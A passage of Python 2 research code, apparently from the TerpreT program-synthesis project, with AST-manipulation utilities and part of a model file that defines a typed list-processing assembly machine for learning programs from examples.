return isinstance(name_node, ast.Name)
def is_constant_definition(assign_node):
return is_int_constant(assign_node.targets[0]) and isinstance(assign_node.value, ast.Num)
def is_hyper_definition(assign_node):
return isinstance(assign_node.value, ast.Call) and \
isinstance(assign_node.value.func, ast.Name) and \
assign_node.value.func.id == "Hyper"
def replace_hypers(root, hypers):
'''
Replace all hyperparameters declared using Hyper() by given values.
'''
class Transformer(ast.NodeTransformer):
def visit_Assign(self_t, node):
if is_hyper_definition(node):
assert isinstance(node.targets[0], ast.Name), \
"Expecting identifier on LHS of hyper definition"
hyper_name = node.targets[0].id
value = hypers[hyper_name]
node.value = ast.copy_location(ast.Num(value), node)
return node
return Transformer().visit(root)
def is_param_definition(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id == "Param"
def is_self_params_assignment(node):
if not isinstance(node.targets[0], ast.Attribute): return False
return node.targets[0].attr == "params"
def is_input_definition(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id == "Input"
def is_output_definition(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id == "Output"
def is_set_to_user_defined_function(node):
if not is_set_to(node): return False
call_node = node.value.args[0]
if not isinstance(call_node, ast.Call): return False
if isinstance(call_node.func, ast.Attribute): # might be tpt function_name
if isinstance(call_node.func.value, ast.Name):
if call_node.func.value.id == "tpt": return False
return True
def make_args_list(args):
return ast.arguments(args=args, vararg=None, kwarg=None, defaults=[])
def get_method_by_name(module_node, name):
class Visitor(ast.NodeVisitor):
def visit_Module(self, node):
self.result = None
self.generic_visit(node)
def visit_FunctionDef(self, node):
if node.name == name:
assert self.result is None, "More than one result in module"
self.result = node
v = Visitor()
v.visit(module_node)
return v.result
def get_class_node(module_node):
class Visitor(ast.NodeVisitor):
def visit_Module(self, node):
self.result = None
self.generic_visit(node)
def visit_ClassDef(self, node):
assert self.result is None, "More than one class in module"
self.result = node
v = Visitor()
v.visit(module_node)
return v.result
def is_param_declaration(node):
if not isinstance(node, ast.Assign): return False
if not isinstance(node.value, ast.Call): return False
if not isinstance(node.value.func, ast.Attribute): return False
if node.value.func.value.id != "tf": return False
if node.value.func.attr != "Variable": return False
return True
def is_param_softmax_assign(node):
if not isinstance(node, ast.Assign): return False
if not isinstance(node.value, ast.Call): return False
if not isinstance(node.value.func, ast.Attribute): return False
if node.value.func.value.id != "tpt": return False
if node.value.func.attr != "softmax": return False
return True
def is_var_definition(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id == "Var"
def is_tpt_decl(assign_node):
if not isinstance(assign_node.value, ast.Call): return False
if not isinstance(assign_node.value.func, ast.Name): return False
return assign_node.value.func.id in ["Var", "Input", "Output", "Param"]
def param_size(assign_node):
assert is_param_definition(assign_node)
assert isinstance(assign_node.value.args[0], ast.Num)
return assign_node.value.args[0].n
def var_names_used_in_call(call_node):
results = []
for arg in call_node.args:
name_node = cast(arg, ast.Name)
results.append(name_node.id)
return results
def var_names_used_in_factor(name_or_call_node):
if isinstance(name_or_call_node, ast.Name):
return [name_or_call_node.id]
elif isinstance(name_or_call_node, ast.Call):
return var_names_used_in_call(name_or_call_node)
else:
assert False, "not name or call node " + ast.dump(name_or_call_node)
def var_names_used_in_set_to(set_to_node):
assert isinstance(set_to_node, ast.Expr), "set_to node should be Expr"
call_node = cast(set_to_node.value, ast.Call)
attribute_node = cast(call_node.func, ast.Attribute)
name_node = cast(attribute_node.value, ast.Name)
lhs_var = name_node.id
assert attribute_node.attr == "set_to", "expected set_to " + ast.dump(attribute_node)
rhs_vars = var_names_used_in_factor(call_node.args[0])
return [lhs_var] + rhs_vars
def name_or_number(name_or_num_node):
if isinstance(name_or_num_node, ast.Name):
return name_or_num_node.id
elif isinstance(name_or_num_node, ast.Num):
return name_or_num_node.n
else:
assert False, "not a name or number " + ast.dump(name_or_num_node)
def parse_factor_expression(call_or_name_node):
if isinstance(call_or_name_node, ast.Name): # a.set_to(b) is shorthand for a.set_to(Copy(b))
name_node = call_or_name_node
return None, [name_node.id]
elif isinstance(call_or_name_node, ast.Call): # a.set_to(f(b))
call_node = call_or_name_node
return call_node.func.id, [name_or_number(node) for node in call_node.args]
elif isinstance(call_or_name_node, ast.Num): # a.observe_value(0)
num_node = call_or_name_node
return None, [int(num_node.n)]
elif isinstance(call_or_name_node, ast.Subscript):
print ast.dump(call_or_name_node)
pdb.set_trace()
else:
assert False, "Can't parse factor " + ast.dump(call_or_name_node)
def parse_assign(assign_node):
var = assign_node.targets[0].id
factor = parse_factor_expression(assign_node.value)
return var, factor
def parse_declaration(assign_node):
if len(assign_node.targets) > 1: return False
if is_macro_definition(assign_node):
return None
var, factor = parse_assign(assign_node)
return var, factor
def if_and_or_else_blocks(if_node):
results = []
results.append(if_node)
if len(if_node.orelse) > 0:
results.extend(if_and_or_else_blocks(if_node.orelse[0])) # recurse on elif branches
return results
def parse_compare(compare_node):
assert len(compare_node.ops) == 1, "multiple comparison ops?" + ast.dump(compare_node)
assert isinstance(compare_node.ops[0], ast.Eq), "comparison should be ==" + \
ast.dump(compare_node.ops[0])
lhs = compare_node.left
rhs = compare_node.comparators[0]
if isinstance(lhs, ast.Name) and isinstance(rhs, ast.Num):
var_name = lhs.id
val = rhs.n
elif isinstance(rhs, ast.Name) and isinstance(lhs, ast.Num):
var_name = rhs.id
val = lhs.n
elif isinstance(rhs, ast.Name) and isinstance(lhs, ast.Name):
# try to apply macro
if is_int_constant(rhs):
var_name = lhs.id
val = rhs.id
elif is_int_constant(lhs):
var_name = rhs.id
val = lhs.id
else:
assert False, "Unable to apply macro to fix comparator " + ast.dump(compare_node)
else:
assert False, "unexpected comparator" + ast.dump(compare_node)
return var_name, val
def string_expr_to_ast(str):
return ast.parse(str).body[0].value
def string_expr_to_ast2(str):
return ast.parse(str).body[0]
def var_used_as_index(tree, var_id):
index_nodes = descendants_of_type(tree, ast.Index)
for index in index_nodes:
name_nodes = descendants_of_type(index, ast.Name)
for name in name_nodes:
if name.id == var_id: return True
return False
def get_single_lhs(node):
if not isinstance(node, ast.Assign): return None
lhs = node.targets
if len(lhs) != 1: return None
return lhs[0]
def descendants_of_type(root, nodetype):
result = []
if isinstance(root, nodetype):
result.append(root)
for ch in ast.iter_child_nodes(root):
ch_result = descendants_of_type(ch, nodetype)
result.extend(ch_result)
return result
def get_kwarg(call_node, kwarg):
assert isinstance(call_node, ast.Call)
for k in call_node.keywords:
if k.arg == kwarg:
return k.value
return None
def function_name(function_node):
if not isinstance(function_node, ast.FunctionDef): return None
return function_node.name
def function_nodes(root):
return descendants_of_type(root, ast.FunctionDef)
def return_nodes(root):
return descendants_of_type(root, ast.Return)
def rhs_function(node):
if not isinstance(node, ast.Assign): return None
rhs = node.value
if isinstance(rhs, ast.Call):
return rhs
elif isinstance(rhs, ast.BinOp):
return rhs
elif isinstance(rhs, ast.UnaryOp):
return rhs
elif isinstance(rhs, ast.Subscript):
return rhs
def is_einsum_function(node):
if isinstance(node, ast.Attribute):
return node.attr == "einsum"
elif isinstance(node, ast.Name):
return node.id == "einsum"
else:
return False
def is_numpy_log(node):
if isinstance(node, ast.Attribute):
return node.value.id == "np" and node.attr == "log"
else:
return False
def is_numpy_function(node, function_name):
if isinstance(node, ast.Attribute):
return node.value.id == "np" and node.attr == function_name
else:
return False
def is_numpy_constructor(node):
if isinstance(node, ast.Attribute):
return node.value.id == "np" and node.attr in ["rand", "randn", "zeros", "ones"]
else:
return False
def is_concatenate_function(node):
if isinstance(node, ast.Attribute):
return node.attr == "concatenate"
elif isinstance(node, ast.Name):
return node.id == "concatenate"
else:
return False
def is_add_function(node):
return isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add)
def is_registered(context, f):
if context is None: return False
def is_forward_function_call(call):
if not isinstance(call.func, ast.Name): return False
name = call.func.id
return name.endswith("_f")
def var_to_dvar(var_node):
if isinstance(var_node, ast.Name):
name = var_node
new_name = ast.Name()
new_id = "d%s" % name.id
new_name.id = new_id
return new_name
elif isinstance(var_node, ast.Subscript):
subscript = var_node
name = subscript.value
new_name = ast.Name(id="d%s" % name.id)
new_subscript = ast.Subscript(value=new_name, slice=subscript.slice)
return new_subscript
else:
print "Error: don't know how to dvar a %s" % ast.dump(var_node)
print r.pretty(var_node)
assert False
def f_to_df(call):
if isinstance(call.func, ast.Name):
new_name = ast.Name(id=call.func.id.replace("_f", "_b"))
else:
assert False
return new_name
def get_concatenate_axis(call):
keywords = call.keywords
for k in keywords:
if k.arg == "axis":
assert isinstance(k.value, ast.Num) # require axes be given as literals
return k.value.n
return 0
def make_unconcat_slice(axis, lower, upper):
dims = []
for i in range(axis):
dims.append(ast.Slice(lower=None, upper=None, step=None))
dims.append(ast.Slice(lower=lower, upper=upper, step=None))
dims.append(ast.Ellipsis())
ext_slice = ast.ExtSlice(dims=dims)
return ext_slice
def NewCall(func=None, args=None, keywords=None, starargs=None):
if args is None:
args = []
if keywords is None:
keywords = []
if starargs is None:
starargs = []
return ast.Call(func=func, args=args, keywords=keywords, starargs=starargs)
def make_attribute(base_name, value_name):
return ast.Attribute(value=ast.Name(id=base_name), attr=ast.Name(id=value_name))
def reverse_loop(for_node):
assert isinstance(for_node, ast.For)
iter_node = for_node.iter
new_iter_node = NewCall(func=ast.Name(id="reversed"), args=[iter_node])
return ast.For(target=for_node.target, iter=new_iter_node, body=for_node.body)
def var_id(var_node):
if isinstance(var_node, ast.Name):
return var_node.id
elif isinstance(var_node, ast.Subscript):
return var_node.value.id
def returns_to_args(returns):
return_value = returns.value
if isinstance(return_value, ast.Tuple):
return [var_to_dvar(elt) for elt in return_value.elts]
elif isinstance(return_value, ast.Name):
return [var_to_dvar(return_value)]
else:
assert False
def ancestors_by_type(node):
pass
def get_condition_rhs_num(if_node):
assert isinstance(if_node, ast.If)
assert isinstance(if_node.test, ast.Compare)
assert isinstance(if_node.test.comparators[0], ast.Num)
return if_node.test.comparators[0].n
def get_condition_lhs(if_node):
assert isinstance(if_node, ast.If)
assert isinstance(if_node.test, ast.Compare)
return unparse(if_node.test.left).strip()
def is_set_to_call(node):
if not isinstance(node, ast.Call): return False
if not isinstance(node.func, ast.Attribute): return False
return node.func.attr == "set_to"
def is_set_to(node):
if not isinstance(node, ast.Expr): return False
return is_set_to_call(node.value)
def is_set_as_input(node):
if not isinstance(node, ast.Expr): return False
if not isinstance(node.value, ast.Call): return False
if not isinstance(node.value.func, ast.Attribute): return False
return node.value.func.attr == "set_as_input"
def is_set_as_output(node):
if not isinstance(node, ast.Expr): return False
if not isinstance(node.value, ast.Call): return False
if not isinstance(node.value.func, ast.Attribute): return False
return node.value.func.attr == "set_as_output"
def ifs_in_elif_block(if_node):
result = [if_node]
while len(if_node.orelse) == 1:
if_node = if_node.orelse[0]
result.append(if_node)
return result
def stmt_from_str(s):
return ast.parse(s).body[0]
def split_name_case(name):
assert False, "doesn't handle X > 9 case"
suffix = name[-len("_caseX"):]
name = name[:-len("_caseX")]
return name, int(suffix[-1])
def dict_to_ast(d):
kvs = ",".join(["'%s': %s" % (k, v) for k, v in sorted(d.iteritems(), key=lambda x: x[0])])
return "{ %s }" % kvs
def object_to_ast(obj):
    return ast.parse(str(obj)).body[0]
def strip_copy_from_name(name):
"""
Removes a trailing _copyX from a name.
"""
ends_in_digit = name[-1].isdigit()
if not ends_in_digit: return name
while ends_in_digit:
name = name[:-1]
ends_in_digit = name[-1].isdigit()
if name.endswith("_case"):
return name[:-len("_case")]
else:
return name
class CFGBuilder(ast.NodeVisitor):
def __init__(self):
self.__next_id = 1
self.__nodes = {} #Maps id -> node
self.__out_edges = {} #Maps id -> id*, signifying possible flow of control
def add_node(self, node):
id = self.__next_id
self.__next_id = id + 1
self.__nodes[id] = node
return id
def add_edge(self, source, target):
assert(source in self.__nodes)
assert(target in self.__nodes)
out_edges = self.__out_edges.get(source, None)
if out_edges is None:
out_edges = []
self.__out_edges[source] = out_edges
        out_edges.append(target)
#Visit methods return a tuple (in, outs), where in is the node id of the unique
#entry to the visited AST node, and outs is the list of all possible exits.
def visit_For(self, node):
raise Exception("TerpreT restriction checking only works on fully unrolled code")
def visit_While(self, node):
raise Exception("TerpreT restriction checking only works on fully unrolled code")
def visit_With(self, node):
raise Exception("TerpreT restriction checking only works on fully unrolled code")
def visit_Block(self, nodes):
if len(nodes) < 1:
raise Exception("Cannot handle empty block")
(entry_id, out_ids) = self.visit(nodes[0])
for i in xrange(1, len(nodes)):
(in_id, new_out_ids) = self.visit(nodes[i])
for old_out_id in out_ids:
self.add_edge(old_out_id, in_id)
out_ids = new_out_ids
return (entry_id, out_ids)
def visit_FunctionDef(self, node):
if len(filter(lambda dec: dec.func.id == "Runtime", node.decorator_list)) > 0:
this_id = self.add_node(node)
return (this_id, [this_id])
else:
raise Exception("TerpreT only allows use of @Runtime functions in execution models.")
def visit_If(self, node):
this_id = self.add_node(node)
(then_in, then_outs) = self.visit_Block(node.body)
self.add_edge(this_id, then_in)
outs = then_outs
if len(node.orelse) > 0:
(else_in, else_outs) = self.visit_Block(node.orelse)
self.add_edge(this_id, else_in)
outs = outs + else_outs
else:
outs = outs + [this_id]
return (this_id, outs)
def visit_Call(self, node):
this_id = self.add_node(node)
return (this_id, [this_id])
def visit_Expr(self, node):
this_id = self.add_node(node)
return (this_id, [this_id])
def visit_Assign(self, node):
this_id = self.add_node(node)
return (this_id, [this_id])
def visit_Module(self, node):
return self.visit_Block(node.body)
def generic_visit(self, node):
raise Exception("Unhandled node in CFG constructor: %s (%s)" % (astunparse.unparse(node), str(node)))
def get_variables(root):
class Visitor(ast.NodeVisitor):
def __init__(self):
self.vars = set()
def visit_Name(self, node):
self.vars.add(node.id)
var_visitor = Visitor()
var_visitor.visit(root)
return var_visitor.vars
def read_inputs(model_filename, hypers_filename, data_filename, train_batch='train'):
# Get source, and start substituting in:
print ("Reading interpreter model from '%s'." % model_filename)
with open(model_filename, 'r') as f:
model = f.read()
parsed_model = ast.parse(model)
# Find right data batch:
print ("Reading example data from '%s'." % data_filename)
with open(data_filename, 'r') as f:
data_batch_list = json.load(f)
data_batch = None
for batch in data_batch_list:
if batch['batch_name'] == train_batch:
data_batch = batch
assert data_batch is not None
# Find right hypers:
print ("Reading model parameters for configuration '%s' from '%s'." % (data_batch['hypers'], hypers_filename))
with open(hypers_filename, 'r') as f:
hypers_list = json.load(f)
hypers = None
for hyper_name, hyper_settings in hypers_list.iteritems():
if hyper_name == data_batch['hypers']:
hypers = hyper_settings
assert hypers is not None
model_name = os.path.splitext(os.path.basename(model_filename))[0]
data_name = os.path.splitext(os.path.basename(data_filename))[0]
out_name = os.path.join("%s-%s-%s" % (model_name,
data_name,
train_batch))
return (parsed_model, data_batch, hypers, out_name)
```
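As a rough sketch of how these helpers fit together (the file names here are assumptions; the keys mirror exactly what `read_inputs` looks up):
```python
# Load a model plus matching hypers/data, then bake the hypers into the AST.
parsed_model, data_batch, hypers, out_name = read_inputs(
    'models/turing.py', 'hypers.json', 'data.json', train_batch='train')
concrete_model = replace_hypers(parsed_model, hypers)  # every Hyper() becomes a literal
```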
#### File: TerpreT/models/nfp_assembly_loops_typed.py
```python
from dummy import Hyper, Param, Var, Runtime, Input, Output, Inline
#### Parameters to the model (changes in this block should not require
#### any changes in the actual model)
maxInt = Hyper()
inputNum = Hyper()
inputStackSize = Hyper()
prefixLength = Hyper()
loopBodyLength = Hyper()
suffixLength = Hyper()
extraRegisterNum = Hyper()
#### Inputs:
##We first need to work out the size of the stack:
#The loop can run at most for the number of input elements + what was allocated in the prefix:
maxLoopsteps = inputStackSize + prefixLength
#One initial timestep, prefix, the loop, suffix:
numTimesteps = 1 + prefixLength + (loopBodyLength * maxLoopsteps) + suffixLength
# The number of stack cells is dependent on the number of instructions and inputs as follows:
# - 1 for Nil
# - inputStackSize
# - prefixLength (as each instruction can allocate a cell)
# - maxLoopsteps (as we create one cell after each iteration)
# - maxLoopsteps * loopBodyLength (as each loopBody instruction can allocate a cell)
# - suffixLength (as each instruction can allocate a cell)
stackPtrAtPrefixStart = 1 + inputStackSize
stackPtrAtLoopStart = stackPtrAtPrefixStart + prefixLength
stackSize = stackPtrAtLoopStart + maxLoopsteps * loopBodyLength + suffixLength
# Registers allow the inputs, the extras, and three additional ones in the loop:
registerNum = inputNum + extraRegisterNum
loopRegisterNum = registerNum + 2
inputRegIntVal = Input(maxInt)[inputNum]
inputRegPtrVal = Input(stackSize)[inputNum]
inputRegBoolVal = Input(2)[inputNum]
inputStackIntVal = Input(maxInt)[inputStackSize]
inputStackPtrVal = Input(stackSize)[inputStackSize]
#### Outputs
outputRegIntVal = Output(maxInt)
outputRegPtrVal = Var(stackSize) #Data structure output is special, see end of file
outputRegBoolVal = Output(2)
outputListVal = Output(maxInt)[stackSize]
#### Execution model description
## Loops: foreach in l, foreach in zip l1, l2
numLoops = 2
#### Instructions: cons, cdr, car, nil/zero/false, add, inc, eq, gt, and, ite, one/true, noop / copy, dec, or
numInstructions = 14
boolSize = 2
@Runtime([maxInt, maxInt], maxInt)
def Add(x, y): return (x + y) % maxInt
@Runtime([maxInt], maxInt)
def Inc(x): return (x + 1) % maxInt
@Runtime([maxInt], maxInt)
def Dec(x): return (x - 1) % maxInt
@Runtime([maxInt, maxInt], boolSize)
def EqTest(a, b): return 1 if a == b else 0
@Runtime([maxInt, maxInt], boolSize)
def GtTest(a, b): return 1 if a > b else 0
@Runtime([boolSize, boolSize], boolSize)
def And(a, b): return 1 if a == 1 and b == 1 else 0
@Runtime([boolSize, boolSize], boolSize)
def Or(a, b): return 1 if a == 1 or b == 1 else 0
# Modeling helper functions, not actual instructions:
@Runtime([registerNum, registerNum], boolSize)
def RegEqTest(a, b): return 1 if a == b else 0
@Runtime([stackSize, stackSize+1], boolSize)
def PtrIsNull(ptr, curStackPtr): return 1 if (ptr == 0 or ptr >= curStackPtr) else 0
@Runtime([stackSize, stackSize, stackSize+1], boolSize)
def OnePtrIsNull(ptr1, ptr2, curStackPtr): return 1 if (ptr1 == 0 or ptr1 >= curStackPtr) or (ptr2 == 0 or ptr2 >= curStackPtr) else 0
## Prefix instructions and arguments
prefixInstructions = Param(numInstructions)[prefixLength]
prefixInstructionsArg1 = Param(registerNum)[prefixLength]
prefixInstructionsArg2 = Param(registerNum)[prefixLength]
prefixInstructionsCondition = Param(registerNum)[prefixLength]
prefixInstructionsOut = Param(registerNum)[prefixLength]
## Suffix instructions and arguments.
suffixInstructions = Param(numInstructions)[suffixLength]
suffixInstructionsArg1 = Param(registerNum)[suffixLength]
suffixInstructionsArg2 = Param(registerNum)[suffixLength]
suffixInstructionsCondition = Param(registerNum)[suffixLength]
suffixInstructionsOut = Param(registerNum)[suffixLength]
## Choosing the loop, its instructions and their arguments:
loop = Param(numLoops)
loopInputList1 = Param(registerNum)
loopInputList2 = Param(registerNum)
loopBodyInstructions = Param(numInstructions)[loopBodyLength]
loopBodyInstructionsOut = Param(registerNum)[loopBodyLength]
loopBodyInstructionsArg1 = Param(loopRegisterNum)[loopBodyLength]
loopBodyInstructionsArg2 = Param(loopRegisterNum)[loopBodyLength]
loopBodyInstructionsCondition = Param(registerNum)[loopBodyLength]
#### Execution data description
## Stack
stackIntVal = Var(maxInt)[stackSize]
stackPtrVal = Var(stackSize)[stackSize]
## Program registers
regIntVal = Var(maxInt)[numTimesteps, registerNum]
regPtrVal = Var(stackSize)[numTimesteps, registerNum]
regBoolVal = Var(2)[numTimesteps, registerNum]
## Pointers to the current loop element, and values:
curLoopElementPtr1 = Var(stackSize)[maxLoopsteps + 1]
curLoopElementPtr2 = Var(stackSize)[maxLoopsteps + 1]
curLoopElementVal1 = Var(maxInt)[maxLoopsteps]
curLoopElementVal2 = Var(maxInt)[maxLoopsteps]
## Temporary things:
# Temp variable that marks that we've reached the end of the list (and
# just sit out the remaining loop steps)
listIsOver = Var(boolSize)[maxLoopsteps + 1]
# Temp variables containing the input arguments (to simplify the remainder of the model)
tmpPrefixArg1IntVal = Var(maxInt)[prefixLength]
tmpPrefixArg1PtrVal = Var(stackSize)[prefixLength]
tmpPrefixArg1BoolVal = Var(2)[prefixLength]
tmpPrefixArg2IntVal = Var(maxInt)[prefixLength]
tmpPrefixArg2PtrVal = Var(stackSize)[prefixLength]
tmpPrefixArg2BoolVal = Var(2)[prefixLength]
tmpPrefixOutIntVal = Var(maxInt)[prefixLength]
tmpPrefixOutPtrVal = Var(stackSize)[prefixLength]
tmpPrefixOutBoolVal = Var(2)[prefixLength]
tmpPrefixConditionVal = Var(2)[prefixLength]
tmpPrefixDoWriteReg = Var(2)[prefixLength, registerNum]
tmpLoopBodyArg1IntVal = Var(maxInt)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg1PtrVal = Var(stackSize)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg1BoolVal = Var(2)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg2IntVal = Var(maxInt)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg2PtrVal = Var(stackSize)[maxLoopsteps, loopBodyLength]
tmpLoopBodyArg2BoolVal = Var(2)[maxLoopsteps, loopBodyLength]
tmpLoopBodyOutIntVal = Var(maxInt)[maxLoopsteps, loopBodyLength]
tmpLoopBodyOutPtrVal = Var(stackSize)[maxLoopsteps, loopBodyLength]
tmpLoopBodyOutBoolVal = Var(2)[maxLoopsteps, loopBodyLength]
tmpLoopBodyConditionVal = Var(2)[maxLoopsteps, loopBodyLength]
tmpLoopBodyDoWriteReg = Var(2)[maxLoopsteps, loopBodyLength, registerNum]
tmpSuffixArg1IntVal = Var(maxInt)[suffixLength]
tmpSuffixArg1PtrVal = Var(stackSize)[suffixLength]
tmpSuffixArg1BoolVal = Var(2)[suffixLength]
tmpSuffixArg2IntVal = Var(maxInt)[suffixLength]
tmpSuffixArg2PtrVal = Var(stackSize)[suffixLength]
tmpSuffixArg2BoolVal = Var(2)[suffixLength]
tmpSuffixOutIntVal = Var(maxInt)[suffixLength]
tmpSuffixOutPtrVal = Var(stackSize)[suffixLength]
tmpSuffixOutBoolVal = Var(2)[suffixLength]
tmpSuffixConditionVal = Var(2)[suffixLength]
tmpSuffixDoWriteReg = Var(2)[suffixLength, registerNum]
@Inline()
def ExecuteInstruction(instruction,
arg1Ptr, arg1Int, arg1Bool,
arg2Ptr, arg2Int, arg2Bool,
condition,
outPtr, outInt, outBool,
curStackPtr, outPtrStack, outIntStack):
#Do the actual execution. Every instruction sets its
#corresponding register value, and the two heap cells:
if instruction == 0: # cons
outInt.set_to(0)
outPtr.set_to(curStackPtr)
outBool.set_to(0)
outIntStack.set_to(arg1Int)
outPtrStack.set_to(arg2Ptr)
elif instruction == 1: # car
with arg1Ptr as p:
if p < curStackPtr:
outInt.set_to(stackIntVal[p])
else:
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 2: # cdr
outInt.set_to(0)
with arg1Ptr as p:
if p < curStackPtr:
outPtr.set_to(stackPtrVal[p])
else:
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 3: # nil/zero/false
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 4: # add
outInt.set_to(Add(arg1Int, arg2Int))
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 5: # inc
outInt.set_to(Inc(arg1Int))
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 6: # eq
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(EqTest(arg1Int, arg2Int))
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 7: # gt
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(GtTest(arg1Int, arg2Int))
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 8: # and
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(And(arg1Bool, arg2Bool))
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 9: # ite
if condition == 1:
outInt.set_to(arg1Int)
outPtr.set_to(arg1Ptr)
outBool.set_to(arg1Bool)
elif condition == 0:
outInt.set_to(arg2Int)
outPtr.set_to(arg2Ptr)
outBool.set_to(arg2Bool)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 10: # one/true
outInt.set_to(1)
outPtr.set_to(0)
outBool.set_to(1)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 11: # noop/copy
outInt.set_to(arg1Int)
outPtr.set_to(arg1Ptr)
outBool.set_to(arg1Bool)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 12: # dec
outInt.set_to(Dec(arg1Int))
outPtr.set_to(0)
outBool.set_to(0)
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
elif instruction == 13: # or
outInt.set_to(0)
outPtr.set_to(0)
outBool.set_to(Or(arg1Bool, arg2Bool))
#These just stay empty:
outIntStack.set_to(0)
outPtrStack.set_to(0)
##### Setting up inputs:
#Copy input registers to temporary registers, set extras to 0:
for i in range(inputNum):
regIntVal[0, i].set_to(inputRegIntVal[i])
regPtrVal[0, i].set_to(inputRegPtrVal[i])
regBoolVal[0, i].set_to(inputRegBoolVal[i])
for r in range(inputNum, registerNum):
regIntVal[0, r].set_to(0)
regPtrVal[0, r].set_to(0)
regBoolVal[0, r].set_to(0)
#Initialize nil element at bottom of stack:
stackIntVal[0].set_to(0)
stackPtrVal[0].set_to(0)
#Copy input stack into our temporary representation:
for i in range(inputStackSize):
stackIntVal[1 + i].set_to(inputStackIntVal[i])
stackPtrVal[1 + i].set_to(inputStackPtrVal[i])
##### Run prefix
for t in range(prefixLength):
# Aliases for instruction processing. Instructions are
# of the following form: "out = op arg1 arg2", where
# arg1 and arg2 are either pointers or integers and
# are chosen based on the type of the operator.
outInt = tmpPrefixOutIntVal[t]
outPtr = tmpPrefixOutPtrVal[t]
outBool = tmpPrefixOutBoolVal[t]
arg1Int = tmpPrefixArg1IntVal[t]
arg1Ptr = tmpPrefixArg1PtrVal[t]
arg1Bool = tmpPrefixArg1BoolVal[t]
arg2Int = tmpPrefixArg2IntVal[t]
arg2Ptr = tmpPrefixArg2PtrVal[t]
arg2Bool = tmpPrefixArg2BoolVal[t]
condition = tmpPrefixConditionVal[t]
#Get the inputs:
with prefixInstructionsArg1[t] as r:
arg1Int.set_to(regIntVal[t, r])
arg1Ptr.set_to(regPtrVal[t, r])
arg1Bool.set_to(regBoolVal[t, r])
with prefixInstructionsArg2[t] as r:
arg2Int.set_to(regIntVal[t, r])
arg2Ptr.set_to(regPtrVal[t, r])
arg2Bool.set_to(regBoolVal[t, r])
with prefixInstructionsCondition[t] as r:
condition.set_to(regBoolVal[t, r])
curStackPtr = stackPtrAtPrefixStart + t
ExecuteInstruction(
prefixInstructions[t],
arg1Ptr, arg1Int, arg1Bool,
arg2Ptr, arg2Int, arg2Bool,
condition,
outPtr, outInt, outBool,
curStackPtr,
stackPtrVal[curStackPtr], stackIntVal[curStackPtr])
for r in range(registerNum):
tmpPrefixDoWriteReg[t, r].set_to(RegEqTest(prefixInstructionsOut[t], r))
if tmpPrefixDoWriteReg[t, r] == 0:
regIntVal[t + 1, r].set_to(regIntVal[t, r])
regPtrVal[t + 1, r].set_to(regPtrVal[t, r])
regBoolVal[t + 1, r].set_to(regBoolVal[t, r])
elif tmpPrefixDoWriteReg[t, r] == 1:
regIntVal[t + 1, r].set_to(outInt)
regPtrVal[t + 1, r].set_to(outPtr)
regBoolVal[t + 1, r].set_to(outBool)
t = prefixLength
##### Set up and run loop:
with loopInputList1 as loopList1Reg:
curLoopElementPtr1[0].set_to(regPtrVal[t, loopList1Reg])
with loopInputList2 as loopList2Reg:
curLoopElementPtr2[0].set_to(regPtrVal[t, loopList2Reg])
#Check if we are done with the list:
if loop == 0: # foreach
listIsOver[0].set_to(PtrIsNull(curLoopElementPtr1[0],
stackPtrAtLoopStart))
elif loop == 1: # foreach zip
listIsOver[0].set_to(OnePtrIsNull(curLoopElementPtr1[0],
curLoopElementPtr2[0],
stackPtrAtLoopStart))
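#Two extra virtual registers expose the current list element(s) to the loop
#body; they sit just past the real registers (cf. loopRegisterNum above):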
ele1RegisterIdx = registerNum
ele2RegisterIdx = registerNum + 1
for l in range(maxLoopsteps):
t = prefixLength + l * loopBodyLength
# At each iteration, we run the loopBody, but first extract current list elements:
if listIsOver[l] == 0:
with curLoopElementPtr1[l] as curPtr1:
if curPtr1 < stackPtrAtLoopStart + l * loopBodyLength:
curLoopElementVal1[l].set_to(stackIntVal[curPtr1])
else:
curLoopElementVal1[l].set_to(0)
with curLoopElementPtr2[l] as curPtr2:
if curPtr2 < stackPtrAtLoopStart + l * loopBodyLength:
curLoopElementVal2[l].set_to(stackIntVal[curPtr2])
else:
curLoopElementVal2[l].set_to(0)
#Execute the body of our loopBody:
for i in range(0, loopBodyLength):
t = prefixLength + l * loopBodyLength + i
# Aliases for instruction processing. Instructions are
# of the following form: "out = op arg1 arg2", where
# arg1 and arg2 are either pointers or integers and
# are chosen based on the type of the operator.
outInt = tmpLoopBodyOutIntVal[l, i]
outPtr = tmpLoopBodyOutPtrVal[l, i]
